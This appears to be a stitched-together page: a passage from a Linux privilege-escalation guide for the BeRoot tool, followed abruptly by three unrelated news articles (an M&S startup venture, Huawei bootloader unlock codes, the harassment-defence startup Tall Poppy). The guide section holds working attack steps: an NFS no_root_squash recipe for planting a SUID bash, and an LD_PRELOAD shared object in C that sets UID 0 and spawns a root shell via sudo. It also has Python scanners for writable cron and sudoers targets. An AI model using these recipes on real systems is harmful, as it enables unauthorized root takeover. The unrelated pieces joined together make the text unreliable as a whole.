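            user, command = fields[1], fields[2]
        else:
            fields = line.split(None, 6)          # m h dom mon dow  user  command
            if len(fields) != 7:
                continue
            user, command = fields[5], fields[6]
        jobs.append((user, command))
    return jobs


def referenced_paths(command: str) -> list:
    """Absolute paths named in a command line (binaries, scripts, configs,
    redirect targets), in order, without duplicates."""
    try:
        tokens = shlex.split(command)
    except ValueError:
        tokens = command.split()
    paths = []
    for tok in tokens:
        tok = tok.lstrip(">")  # ">>/var/log/x" -> "/var/log/x"
        if tok.startswith("/") and len(tok) > 1 and tok not in paths:
            paths.append(tok)
    return paths


def crontab_attack_surface(text: str) -> dict:
    """Map each job's command line to the paths an attacker would want write access to."""
    return {command: referenced_paths(command) for _, command in parse_system_crontab(text)}


def writable(paths) -> list:
    """Live check: which of these paths can the current user write to?"""
    return [p for p in paths if os.access(p, os.W_OK)]


# Constructed sample in /etc/crontab format
SAMPLE_CRONTAB = """# /etc/crontab: constructed sample
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
0  3    * * *   root    /opt/backup/nightly.sh >> /var/log/nightly.log 2>&1
@reboot         root    /usr/local/bin/start-agent --config /etc/agent/agent.conf
30 4    * * 1   www-data /usr/bin/python3 /var/www/tools/cleanup.py
"""

if __name__ == "__main__":
    print("writable sensitive files:", writable(SENSITIVE_FILES))
    for command, paths in crontab_attack_surface(SAMPLE_CRONTAB).items():
        print(f"{command!r} -> {paths} (writable now: {writable(paths)})")
```

A writable script or config on that list run by root is the direct win; a writable redirect target is only informational. Per-user crontabs under /var/spool/cron have no user field, so they need fields[5:] shifted by one.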



Suid binaries



SUID (Set owner User ID upon execution) is a special file permission bit. A SUID executable runs with the privileges of the file owner rather than those of the user who launches it, so a SUID binary owned by root executes with root privileges.


BeRoot prints all SUID files because each binary has to be analysed manually. However, it performs some checks:

  • checks whether we have write permission on these binaries (why not? :))
  • checks whether a LOLBin is SUID, to be able to execute system commands with it (remember that a SUID LOLBin does not always let you execute commands; see the false-positive example using mount in the LOLBins section).

For manual analysis, checking for .so files loaded from a writable path is a good idea (this check is not implemented in BeRoot). Note that the kernel ignores the SUID bit when an unprivileged user traces a binary, so this runs it with your own privileges, which is fine for mapping what it tries to open:

strace [SUID_PATH] 2>&1 | grep -i -E "open|access|no such file"


NFS Root Squashing



If no_root_squash appears in /etc/exports, privilege escalation may be possible: root on an NFS client keeps root ownership when writing to the share. More information can be found here.

Exploitation (as root on a machine you control, which mounts the share):

  • mkdir /tmp/nfsdir  # create dir
  • mount -t nfs 192.168.1.10:/shared /tmp/nfsdir  # mount directory
  • cd /tmp/nfsdir
  • cp /bin/bash .  # copy wanted shell
  • chmod +s bash  # set suid permission

Then, on the target, run the copied binary with bash -p so that bash ke1eps the effective UID.



LD_PRELOAD



If LD_PRELOAD is explicitly kept in the sudoers file, it can be used to elevate our privileges.

For example:

Defaults        env_keep += LD_PRELOAD

Create a shared object:

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/sh");
}

Compile it:

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

If you have a binary that you can launch with sudo and NOPASSWD, launch it with LD_PRELOAD pointing to your shared object:

sudo LD_PRELOAD=/tmp/shell.so find


Sudoers file



Most privilege escalations on Linux servers are done through bad sudo configurations, which live in the /etc/sudoers file.

To better understand the BeRoot workflow, you should have an idea of how a sudoers line is composed.


Basic line pattern:


users  hosts = (run-as) tags: commands


Here is an example using aliases.



User_Alias ADMINS = admin, user, root


Cmnd_Alias ADMIN_CMDS = /sbin/service, /usr/sbin/iptables, python /tmp/file.py


ADMINS ALL = (ALL) NOPASSWD: ADMIN_CMDS


So the users “admin”, “user” and “root” can execute “service”, “iptables” and “file.py” without a password (thanks to NOPASSWD); it is equivalent to the single line:


admin,user,root ALL = (ALL) NOPASSWD: /sbin/service, /usr/sbin/iptables, python /tmp/file.py


So BeRoot analyses every rule and, if it applies to our user or one of our user’s groups:

  • checks whether we have write permission on all the commands involved (in our example it tests “service”, “iptables”, “python” and “/tmp/file.py”)
  • checks for LOLBins
  • checks for LOLBins combined with wildcards
  • checks whether we can impersonate another user (“su” command)
  • checks write permissions on sensitive files and SUID binaries for this user
  • repeats all these checks on the sudoers file as this new user
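Added example (not BeRoot's code) of the analysis just described, in Python: parse the sudoers file, expand User_Alias and Cmnd_Alias, keep the rules that apply to a user and their groups, and mark what to check in each command (paths to write-test, LOLBins, wildcards). The sudoers text is constructed around the page's example; #include directives and #uid specs are ignored for brevity.

```python
"""Added example (not BeRoot's code): sudoers rule expansion and per-command triage."""
import os
import re
import shlex

# Binaries from the LOLBins section (plus su for user impersonation)
LOLBINS = {"awk", "docker", "find", "less", "man", "more", "cp", "mv", "ftp", "sftp",
           "git", "mount", "nmap", "rsync", "lua", "perl", "python", "python3", "ruby",
           "tar", "vi", "vim", "tcpdump", "wget", "zip", "su"}

ALIAS_RE = re.compile(r"(User_Alias|Runas_Alias|Host_Alias|Cmnd_Alias)\s+(\w+)\s*=\s*(.*)")
# users  hosts = (run-as) tags: commands
RULE_RE = re.compile(r"(\S+)\s+(\S+)\s*=\s*(?:\((.*?)\))?\s*((?:\w+:\s*)*)(.*)")


def parse_sudoers(text: str):
    """Return (user_aliases, cmnd_aliases, rules) from sudoers text."""
    user_aliases, cmnd_aliases, rules = {}, {}, []
    text = text.replace("\\\n", " ")               # join continuation lines
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments (also #include / #uid, simplification)
        if not line or line.startswith("Defaults"):
            continue
        m = ALIAS_RE.match(line)
        if m:
            kind, name, members = m.groups()
            members = [x.strip() for x in members.split(",")]
            if kind == "User_Alias":
                user_aliases[name] = members
            elif kind == "Cmnd_Alias":
                cmnd_aliases[name] = members
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        users, hosts, runas, tags, cmds = m.groups()
        rules.append({
            "users": [u.strip() for u in users.split(",")],
            "hosts": hosts,
            "runas": runas or "root",
            "tags": [t.strip() for t in tags.split(":") if t.strip()],
            "commands": [c.strip() for c in cmds.split(",")],  # commas inside arguments not handled
        })
    return user_aliases, cmnd_aliases, rules


def _expand(names, aliases):
    """Recursively replace alias names by their members."""
    out = []
    for n in names:
        out.extend(_expand(aliases[n], aliases) if n in aliases else [n])
    return out


def rules_for(user: str, groups, sudoers_text: str) -> list:
    """Rules whose user list covers `user` directly, via an alias, via %group, or ALL."""
    user_aliases, cmnd_aliases, rules = parse_sudoers(sudoers_text)
    matches = []
    for rule in rules:
        who = set(_expand(rule["users"], user_aliases))
        if user in who or "ALL" in who or any(f"%{g}" in who for g in groups):
            matches.append({
                "runas": rule["runas"],
                "nopasswd": "NOPASSWD" in rule["tags"],
                "commands": _expand(rule["commands"], cmnd_aliases),
            })
    return matches


def analyse_command(command: str) -> dict:
    """What BeRoot would look at for one sudo-able command."""
    if command == "ALL":  # any command: trivially root
        return {"command": command, "paths_to_check": [], "lolbin": True, "wildcard": False}
    tokens = shlex.split(command)
    return {
        "command": command,
        # the binary itself plus every absolute path among its arguments
        "paths_to_check": [tokens[0]] + [t for t in tokens[1:] if t.startswith("/")],
        "lolbin": os.path.basename(tokens[0]) in LOLBINS,
        "wildcard": any(ch in command for ch in "*?["),
    }


# Constructed sudoers built around the page's example
SAMPLE_SUDOERS = """# constructed /etc/sudoers
Defaults        env_reset
User_Alias ADMINS = admin, user, root
Cmnd_Alias ADMIN_CMDS = /sbin/service, /usr/sbin/iptables, python /tmp/file.py
ADMINS ALL = (ALL) NOPASSWD: ADMIN_CMDS
%backup ALL = (root) /usr/bin/tar cf /backup/*.tar /home/*
bob ALL=(ALL) ALL
"""

if __name__ == "__main__":
    for rule in rules_for("user", ["staff"], SAMPLE_SUDOERS):
        for command in rule["commands"]:
            print(rule["runas"], rule["nopasswd"], analyse_command(command))
```

Each path in paths_to_check is then write-tested (as BeRoot does), a lolbin hit is cross-checked against the LOLBins list for a working escape, and a wildcard hit goes to the manual review the wildcard section describes.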



Download BeRoot


Founders Factory signs Marks & Spencer as exclusive UK retail investor

The model of building vertical market-specific accelerators is now well known, but in the UK, Founders Factory, which has emerged from Lastminute founder Brent Hoberman’s stable of projects, is poised to take it to another level.

Today it launches Founders Factory Retail, a joint venture with UK retail giant Marks & Spencer, focused on investing in and growing start-ups. M&S will become Founders Factory’s exclusive UK & European partner, and invest in a number of start-ups, sourced through Founders Factory’s network, which will expose the retail business to new “technologies, business models and entrepreneurial thinking”.

M&S famously admitted it had a ‘burning platform’ recently, so it’s to be hoped this startup DNA will re-energise the company. M&S will become the majority shareholder within the JV.

Steve Rowe, Chief Executive said: “Partnering with Founders Factory as their exclusive retail partner gives M&S access to a global network of start-ups and entrepreneurs which will provide disruptive thinking and questioning to the way we work at a time of critical transformation within the business. Founders Factory have a great track record in creating successful businesses and by investing in new innovative technologies and products we hope to change the way we work and operate.”

Brent Hoberman, Co-Founder and Executive Chairman, Founders Factory: “We are excited to partner with M&S as our exclusive retail investor in the UK and combine the company’s scale and experience to support early-stage founders. After over 60 investments in the last two years we have seen the huge potential of combining startup innovation with corporate scale and expertise, and so we are excited by this new chapter in a sector that is changing rapidly through technology.”

Started by Brent Hoberman and Henry Lane Fox, Founders Factory has received investment from L’Oreal, easyJet, Guardian Media Group, Aviva, Holtzbrinck, CSC.

The idea is that as well as accelerating companies it also incubates them, creating around 13 new startups from scratch every year. It also invests in 35 startups every year, providing cash, six months of support and commercial opportunities with its corporate investors. To date, it has backed and built over 60 companies and is aiming for 220 within five years.

In an interview with TechCrunch Hoberman added: “This deal with M&S is a new model for us. We expect to expand to more sectors in this way. M&S is an iconic British brand so it’s a really good next step for us. We think we’re succeeding because of the sheer nature of the ambition we have for the project. Just funding an accelerator would not be as successful as this combination of best ideas from the cross-fertilization of sectors, big corporate partners and the network of experience we can tap into.”

“This is a bespoke program with a full-time team of 60 operational people to help. It’s a very different model from the likes of Techstars or Startup Bootcamp, for instance. It has full-time employees and multiple corporates. We have seven corporate backers with shared equity, then on top have WPP’s Wunderman agency. I think this is a globally innovative model. We didn’t copy this from the US.”

Today is the last day to request a bootloader unlock code for Huawei/Honor devices


Chinese technology giant Huawei and its sub-brand Honor have been slowly garnering more respect among the Android enthusiast community in the past year. With timely software updates, commitments to supporting custom development, and widespread Project Treble adoption for all devices they have updated to Android Oreo, it’s not hard to see why Huawei and Honor smartphones were starting to become more popular on our forums. Unfortunately, the company had a sudden change of heart. Two months ago, the company announced that they will stop providing bootloader unlock codes. If you want to unlock the bootloader of your Huawei or Honor device, today is the last day to request a code.


While unlocking the bootloader on a Huawei or Honor device isn’t as simple as on Google or OnePlus devices, it’s not a difficult process. On Huawei and Honor devices, you need to acquire a bootloader unlock code if you want to be able to unlock the bootloader. The page to request a code requires you to fill in details about your device and sign in with your Huawei account, but it’s a fairly simple form to fill out. Getting the bootloader unlock code is usually instant, too, unlike Xiaomi devices where you have to wait 360 hours.


Unlocking the bootloader opens up the ability to gain root access with Magisk or SuperSU, install a custom recovery like TWRP to make backups, flash custom ROMs such as LineageOS, Resurrection Remix, or CarbonROM, flash custom kernels, or flash modifications like ARISE and the Xposed Framework. We’ve shown how flashing an AOSP ROM can result in huge performance improvements on budget Honor devices like the Honor 9 Lite without sacrificing camera quality thanks to mods like the Huawei P20 camera port. None of this would be possible without an unlockable bootloader, which is why it’s a huge blow to the community for the unlock codes to no longer be obtainable.


We have reached out to our contacts at Honor and Huawei and have not heard any news that the company will provide bootloader unlock codes in the future. The company’s reason for ending the program is it provides a “better user experience and avoids issues caused by ROM flashing.” We don’t agree with this reason because the company already makes you jump through hoops to unlock the bootloader. Furthermore, it’s entirely opt-in, so users who experience problems have only themselves to blame if something goes wrong. It certainly doesn’t help that Huawei and Honor stopped providing firmware for local upgrades, either, as their eRecovery tool often fails to restore devices when it’s accessed outside of China.


If you would like to unlock the bootloader on your Huawei or Honor device, you need to register for an unlock code immediately. You don’t necessarily have to unlock the bootloader now, but if you don’t get the code now you’ll never have that option in the future. So go grab that code now and save it somewhere in case you decide to make the plunge. If you do decide to unlock the bootloader, be sure to check out the XDA forum for your device to stay up to date on the latest developments.


Request bootloader unlock code on Huawei or Honor devices




Sunday

Tall Poppy aims to make online harassment protection an employee benefit

For the nearly 20 percent of Americans who experience severe online harassment, there’s a new company launching in the latest batch of Y Combinator called Tall Poppy that’s giving them the tools to fight back.

Co-founded by Leigh Honeywell and Logan Dean, Tall Poppy grew out of the work that Honeywell, a security specialist, had been doing to hunt down trolls in online communities since at least 2008.

That was the year that Honeywell first went after a particularly noxious specimen who spent his time sending death threats to women in various Linux communities. Honeywell cooperated with law enforcement to try and track down the troll and eventually pushed the commenter into hiding after he was visited by investigators.

That early success led Honeywell to assume a not-so-secret identity as a security expert by day for companies like Microsoft, Salesforce, and Slack, and a defender against online harassment when she wasn’t at work.

“It was an accidental thing that I got into this work,” says Honeywell. “It’s sort of an occupational hazard of being an internet feminist.”

Honeywell started working one-on-one with victims of online harassment who were referred to her directly.

“As people were coming forward with #metoo… I was working with a number of high profile folks to essentially batten down the hatches,” says Honeywell. “It’s been satisfying work helping people get back a sense of safety when they feel like they have lost it.”

As those referrals began to climb (eventually numbering in the low hundreds of cases), Honeywell began to think about ways to systematize her approach so it could reach the widest number of people possible.

“The reason we’re doing it that way is to help scale up,” says Honeywell. “As with everything in computer security it’s an arms race… As you learn to combat abuse the abusive people adopt technologies and learn new tactics and ways to get around it.”

Primarily, Tall Poppy will provide an educational toolkit to help people lock down their own presence and do incident response properly, says Honeywell. The company will work with customers to gain an understanding of how to protect themselves, but also to be aware of the laws in each state that they can use to protect themselves and punish their attackers.

The scope of the problem

Based on research conducted by the Pew Foundation, there are millions of people in the U.S. alone, who could benefit from the type of service that Tall Poppy aims to provide.

According to a 2017 study, “nearly one-in-five Americans (18%) have been subjected to particularly severe forms of harassment online, such as physical threats, harassment over a sustained period, sexual harassment or stalking.”

The women and minorities who bear the brunt of these assaults (and, let’s be clear, it is primarily women and minorities who bear the brunt) face very real consequences from these virtual assaults.

Take the case of the New York principal who lost her job when an ex-boyfriend sent stolen photographs of her to the New York Post and her boss. In a powerful piece for Jezebel she wrote about the consequences of her harassment.

As a result, city investigators escorted me out of my school pending an investigation. The subsequent investigation quickly showed that I was set up by my abuser. Still, Mayor Bill de Blasio’s administration demoted me from principal to teacher, slashed my pay in half, and sent me to a rubber room, the DOE’s notorious reassignment centers where hundreds of unwanted employees languish until they are fired or forgotten.

In 2016, I took a yearlong medical leave from the DOE to treat extreme post-traumatic stress and anxiety. Since the leave was almost entirely unpaid, I took loans against my pension to get by. I ran out of money in early 2017 and reported back to the department, where I was quickly sent to an administrative trial. There the city tried to terminate me. I was charged with eight counts of misconduct despite the conclusion by all parties that my ex-partner uploaded the photos to the computer and that there was no evidence to back up his salacious story. I was accused of bringing “widespread negative publicity, ridicule and notoriety” to the school system, as well as “failing to safeguard a Department of Education computer” from my abusive ex.

Her story isn’t unique. Victims of online harassment regularly face serious real-world consequences.

According to a 2013 Science Daily study, cyber stalking victims routinely need to take time off from work, or change or quit their job or school. And the stalking costs the victims $1200 on average to even attempt to address the harassment, the study said.

“It’s this widespread problem and the platforms have in many ways dropped the ball on this,” Honeywell says.

Tall Poppy’s co-founders

Creating Tall Poppy

As Honeywell heard more and more stories of online intimidation and assault, she started laying the groundwork for the service that would eventually become Tall Poppy. Through a mutual friend she reached out to Dean, a talented coder who had been working at Ticketfly before its Eventbrite acquisition and was looking for a new opportunity.

That was in early 2015. But, afraid that striking out on her own would affect her citizenship status (Honeywell is Canadian), she and Dean waited before making the move to finally start the company.

What ultimately convinced them was the election of Donald Trump.

“After the election I had a heart-to-heart with myself… And I decided that I could move back to Canada, but I wanted to stay and fight,” Honeywell says.

Initially, Honeywell took on a year-long fellowship with the American Civil Liberties Union to pick up on work around privacy and security that had been handled by Chris Soghoian who had left to take a position with Senator Ron Wyden’s office.

But the idea for Tall Poppy remained, and once Honeywell received her green card, she was “chomping at the bit to start this company.”

A few months in the company already has businesses that have signed up for the services and tools it provides to help companies protect their employees.

Some platforms have taken small steps against online harassment. Facebook, for instance, launched an initiative to get people to upload their nude pictures so that the social network can monitor when similar images are distributed online and contact a user to see if the distribution is consensual.

Meanwhile, Twitter has made a series of changes to its algorithm to combat online abuse.

“People were shocked and horrified that people were trying this,” Honeywell says. “[But] what is the way [harassers] can do the most damage? Sharing them to Facebook is one of the ways where they can do the most damage. It was a worthwhile experiment.”

To underscore how pervasive a problem online harassment is: among the four companies where Tall Poppy is doing business, or could do business, in its first month and a half, there is already an issue that the company is addressing.

“It is an important problem to work on,” says Honeywell. “My recurring realization is that the cavalry is not coming.”